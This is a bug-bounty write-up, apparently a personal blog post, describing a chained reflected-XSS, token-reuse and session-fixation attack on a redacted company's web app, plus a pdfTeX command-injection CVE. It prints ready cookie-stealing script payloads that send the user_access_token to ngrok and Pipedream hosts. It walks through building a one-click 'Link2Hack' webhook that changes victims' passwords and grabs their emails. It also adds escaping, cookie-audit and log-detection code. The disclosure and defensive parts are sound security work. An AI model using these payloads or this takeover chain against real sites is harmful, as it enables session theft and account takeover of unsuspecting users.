From XSS To CSRF | One-click Authorized Access To Account Takeover

Hey guys, today I’ll show you my latest finding in a company that may become a tech unicorn very soon! The company’s name is withheld in line with its own policy.

Chaining 4 Vulnerabilities to Reach the Maximum Possible Impact

1st — [Reflected XSS] -

XSS enables attackers to inject client-side scripts into HTML pages viewed by other users. So I tried to execute a simple payload in the search box:

"><script>confirm('test')</script>

And it worked!

Honestly, I didn’t expect that. So I decided to dig more, highly confident that I would find more vulnerabilities. The impact of this vulnerability on the user is severe because of the ability to steal the user’s cookies and use them to access the website as that user. I used ngrok to tunnel to my localhost and passed the document.cookie value in an HTTP request made through XMLHttpRequest (XHR).

Let’s remove the spaces and condense the code a bit:

<script>x=new XMLHttpRequest();x.open('GET','https://764ec77e.ngrok.io/'+document.cookie);x.send();</script>

When we check the ngrok dashboard, we get the user’s cookies in the request. Notice the most important one, user_access_token; we will come back to it later.

We can add these cookies to the browser, send them to the website and log in as the victim.
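Two server-side checks would have broken this first step: escaping the search term before it is reflected into HTML, and marking the token cookie HttpOnly so document.cookie cannot read it. The following is an added example, not code from the original post or from the affected application; the function names and the sample Set-Cookie value are constructed for illustration.

```javascript
// Added example (not from the original post or the application): two checks
// that stop the reflected-XSS-to-cookie-theft step. escapeHtml() neutralises a
// search term reflected into HTML; auditSetCookie() reports which protective
// attributes a Set-Cookie header is missing. Names and samples are constructed.

// Characters that must not reach an HTML text or attribute context raw.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape user input before reflecting it into HTML. After this, the payload
// from the post is rendered as text instead of being parsed as a <script> tag.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Attributes a session/token cookie should carry. HttpOnly keeps the value out
// of document.cookie, which is exactly what the XHR payload in the post reads.
const REQUIRED_COOKIE_ATTRS = ['HttpOnly', 'Secure', 'SameSite'];

// Return the required attributes missing from a Set-Cookie header value.
function auditSetCookie(setCookieHeader) {
  const present = setCookieHeader
    .split(';')
    .slice(1) // the first segment is name=value, the rest are attributes
    .map((attr) => attr.trim().split('=')[0].toLowerCase());
  return REQUIRED_COOKIE_ATTRS.filter((name) => !present.includes(name.toLowerCase()));
}

// Constructed sample values for a stand-alone run.
const SAMPLE_SEARCH = `"><script>confirm('test')</script>`;
const SAMPLE_COOKIE = 'user_access_token=eyJhbGciOi.example.sig; Path=/';

console.log('reflected safely as:', escapeHtml(SAMPLE_SEARCH));
console.log('cookie is missing:', auditSetCookie(SAMPLE_COOKIE));
```

Run it with node and the search payload comes back as inert entities, while the token cookie is reported as missing all three attributes; with HttpOnly set, the document.cookie read in the later payload would simply not contain user_access_token.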

2nd — [Cross-Site Request Forgery] -

I intercepted the change-password request. Looking carefully, I noticed that the JSON Web Token we got from the previous XSS (user_access_token) is used without a CSRF token, so I was able to change the password and take over the account. Moreover, the API response returns user information containing sensitive data such as the email address, so the attacker can use it to log in without any hassle.

Replacing the JWT in the Authorization header with the stolen user_access_token changes the password on behalf of the user.

Level-Up!

I tried to chain the XSS with the CSRF to take over the account and increase the impact of the vulnerabilities, with a scenario I called “Link2Hack”: the victim only needs to click on a link to have the session cookies hijacked, the password changed and the victim’s email retrieved from the response instantly.

To implement this scenario I chose the fastest way to build the PoC: Pipedream, which creates a webhook, so we are able to handle the response and make another HTTP request to the endpoint to change the password without managing a server. Also, Pipedream allows you to run JavaScript code in a Node.js environment!

Let’s jump to the practical part.

1) Create your workflow

When you click on New Workflow, you’ll get your workflow endpoint, e.g.:

https://entxk3uixmzvh5f.m.pipedream.net

Add a new action to your workflow by clicking the + button between any two steps.

I will choose the fastest way and select “Send HTTP Request”. It has one required parameter: the URL the HTTP request is sent to. To change the HTTP method or add an HTTP payload, query string parameters or headers, I click “add individual property”. I change the method to PATCH, then set the headers, which are very important to make a correct request:

Accept: application/vnd.api+json
Origin: https://redacted.net
Content-Type: application/vnd.api+json
Authorization: Bearer

Now we’re going to work on the Authorization header and append the user_access_token value to the word ‘Bearer’, since the application uses JWTs. I’ll pass this value in the ‘c’ query parameter and read it from the steps object, for example:

https://entxk3uixmzvh5f.m.pipedream.net/?c=our_value_here

I can access properties of the HTTP request through the event object, steps.trigger.event:

  • steps.trigger.event.body : A string or object representation of the HTTP payload
  • steps.trigger.event.client_ip : IP address of the client that made the request
  • steps.trigger.event.headers : HTTP headers, represented as an object
  • steps.trigger.event.method : HTTP method
  • steps.trigger.event.url : Request host + path
  • steps.trigger.event.query : URL Parameters

Accessing the ‘c’ parameter then looks like this: steps.trigger.event.query.c

Final step: add the body of the request in the payload parameter, which contains the new password.

2) Get specific cookie value

Since we also get other values (LiToken, ci_sessions, user_access_token) and we need only user_access_token to make the request, I’ll use a regex to cut it out of the cookie string. The replace() method searches a string for a specified value or a regular expression and returns a new string where the matches are replaced.

replace(searchValue, replacer)

document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1")

So the final payload is going to look like this:

<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>

Well done, everything is set up right. The full URL:

https://redacted.com/?q=<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>

URL-encoded, it is ready to send. Once a user clicks on the link, the JavaScript code is executed, hijacks the session cookies, changes the password and retrieves the user’s email from the response for signing in.
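From the defender’s side, the link above leaves a clear trace: a request whose query string carries a script tag, usually percent-encoded. The following is an added example, not part of the original post, of a detection pass over web-server access-log lines that flags such requests after URL-decoding them (including double-encoded variants). The log lines and IP addresses are constructed for the example; the request-line regex assumes the common combined log format.

```javascript
// Added example (not from the original post): flag access-log entries whose
// query string contains a script payload like the one in the post. Log lines
// are constructed here; the format assumed is the common combined log format.

// Payload shapes seen in this post, matched after decoding.
const XSS_MARKERS = [/<script\b/i, /<\/script>/i, /javascript:/i, /\bon(?:error|load|click)\s*=/i];

// Percent-decode repeatedly (at most 3 rounds) so double-encoded payloads
// such as %253Cscript%253E are still recognised.
function fullyDecode(s) {
  let prev = s;
  for (let i = 0; i < 3; i++) {
    let next;
    try {
      next = decodeURIComponent(prev.replace(/\+/g, ' '));
    } catch (e) {
      return prev; // malformed escape sequence: keep what we have
    }
    if (next === prev) break;
    prev = next;
  }
  return prev;
}

// Extract the request target from a combined-log request line such as
// "GET /?q=... HTTP/1.1"; returns null if the line does not parse.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|PATCH|PUT|DELETE) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Return { clientIp, target, decoded } for every line whose decoded query
// string matches one of the XSS markers.
function findXssAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const target = requestTarget(line);
    if (!target || !target.includes('?')) continue;
    const decoded = fullyDecode(target.slice(target.indexOf('?') + 1));
    if (XSS_MARKERS.some((re) => re.test(decoded))) {
      hits.push({ clientIp: line.split(' ')[0], target, decoded });
    }
  }
  return hits;
}

// Constructed sample log: one benign search, one reflected-XSS probe, one
// double-encoded probe and one unrelated API call.
const SAMPLE_LOG = [
  '203.0.113.5 - - [01/Jan/2020:10:00:00 +0000] "GET /?q=laptop HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [01/Jan/2020:10:00:01 +0000] "GET /?q=%22%3E%3Cscript%3Econfirm(%27test%27)%3C/script%3E HTTP/1.1" 200 614 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [01/Jan/2020:10:00:02 +0000] "GET /?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 614 "-" "Mozilla/5.0"',
  '198.51.100.2 - - [01/Jan/2020:10:00:03 +0000] "PATCH /api/password HTTP/1.1" 200 88 "-" "curl/7.68"',
];

for (const hit of findXssAttempts(SAMPLE_LOG)) {
  console.log(`XSS attempt from ${hit.clientIp}: ${hit.decoded}`);
}
```

Pair this with the application’s own response code: a 200 with a reflected `<script` in the query is the case worth paging on, since it means the page echoed the payload rather than rejecting it.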

3rd — [Session Fixation] -

Session fixation: authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier (session ID) gives an attacker the opportunity to steal authenticated sessions, or to create a new session on a web application and record the associated session identifier. Unfortunately, this is what happened in this web app. After changing the password, the previous session ID still works, which means the account can still be used with the old session after the password has changed.

4th — [Possible Buffer Overflow] -

The company allows you to generate a CV from your profile, which is created in PDF format. I generated a CV, downloaded it, and then extracted the PDF metadata using exiftool:

This is pdfTeX, Version 3.14159265–2.6–1.40.15 (TeX Live 2015/dev/Debian) kpathsea version 6.2.1dev. from TeX Users Group website:

This version is affected by a buffer overflow [CVE-2018-17407] discovered in TeX Live before 2018-09-21. Briefly, it can be used to make a glyph name from the font file serve as an argument to system(). But what is a glyph? A glyph is a graphical symbol used to represent a readable character for the purposes of writing. Using pdffonts to list the fonts in our PDF:

Its contents are loaded into memory from reading entries like these from the .pfb file:

So the exploit is as follows: dup 72 /COMMAND_HERE put, for example

dup 72 /whoami put

which executes the command with the permissions of the pdflatex process. Since this vulnerability wasn’t in the web application itself, I wasn’t able to reproduce it. For further information, see the excellent blog post by Nick Roessler, who discovered this vulnerability.

Thank you for reading this far. Your feedback is highly appreciated. Twitter: @Psych0x02
